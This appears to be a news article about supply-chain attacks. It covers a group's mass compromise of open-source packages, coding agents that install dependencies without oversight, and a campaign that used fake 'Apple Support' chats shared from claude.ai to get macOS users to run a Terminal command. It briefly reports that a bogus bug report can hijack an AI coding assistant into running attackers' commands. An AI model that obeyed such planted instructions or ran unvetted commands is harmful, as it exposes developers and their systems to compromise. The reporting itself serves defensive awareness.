Trust is the objective: supply-chain attacks in the era of AI.

      Hackers are no longer simply breaking in; they are taking advantage of the doors left open for them. This past week made it clear that what developers hold dear—open-source code and AI tools—has become the easiest targets for attacks.

      1,000 Compromised Packages

      The first example involves a group called TeamPCP. In less than four months, they have inserted malicious code into over 1,000 open-source software packages, as reported by CyberScoop. The operation began with just one tool in February and has continued at a rapid pace since then. The approach used is not intricate, which is precisely the point. Many companies often integrate code automatically, rarely verifying its safety. TeamPCP exploits that trust. Collectively, the compromised packages accumulate around 500 million downloads each week. The identified victims include prominent names such as Bitwarden, Red Hat, SAP, PyTorch Lightning, and even GitHub. Nevertheless, it appears the group is not motivated by financial gain, with researchers suggesting their aim is more about creating chaos and gaining notoriety, having only acquired about $90,000 through extortion. One security firm now estimates that there is approximately a 1-in-10 chance that any package an organization installs could activate an ongoing attack.

      AI Intensifies the Problem

      The issue is exacerbated by AI. Developers used to scrutinize their dependencies more closely than they do now. Currently, coding agents autonomously install packages, often without any human oversight. “In some scenarios, there’s nearly no human involvement,” remarked Socket's Feross Aboukhadijeh in a statement to CyberScoop. These agents are also under threat. Researchers have demonstrated that a bogus bug report can commandeer an AI coding assistant to execute commands from attackers. Self-replicating worms are already infiltrating code repositories, and a compromised editor extension has enabled attackers to steal numerous GitHub repositories.

      Even Claude Became a Tool for Attacks

      The second campaign is more subtle. Hackers manipulated Anthropic’s Claude against its users, misusing “Shared Chats,” a feature that allows users to share public links to previous conversations. The attackers set up fake “Apple Support” chats on claude.ai, instructing macOS developers to enter a command into their Terminal. They also purchased Google ads for searches such as “Claude Code on Mac” to lure victims to these conversations. Since the links were hosted on Claude’s trusted domain, they appeared to be safe. Trend Micro reported over 2,000 victims, mainly in the Asia-Pacific region. Following the incident, Anthropic banned the accounts involved and disabled the related conversations.

      Importance of the Situation

      The commonality between these incidents is trust. Attackers no longer require sophisticated exploits; they simply need to manipulate something you already trust: a package registry, a coding agent, or a familiar domain. As one industry bulletin noted, “legitimate” does not equate to “safe.” For the industry, this represents a jarring reset. It necessitates vigilance over the tools people rely on, not just the files they download. It compels treating package installations as if they are executing code and AI agents as user accounts. The web did not fail this week; it was simply utilized in exactly the way it was designed, which may prove to be a more challenging issue to resolve.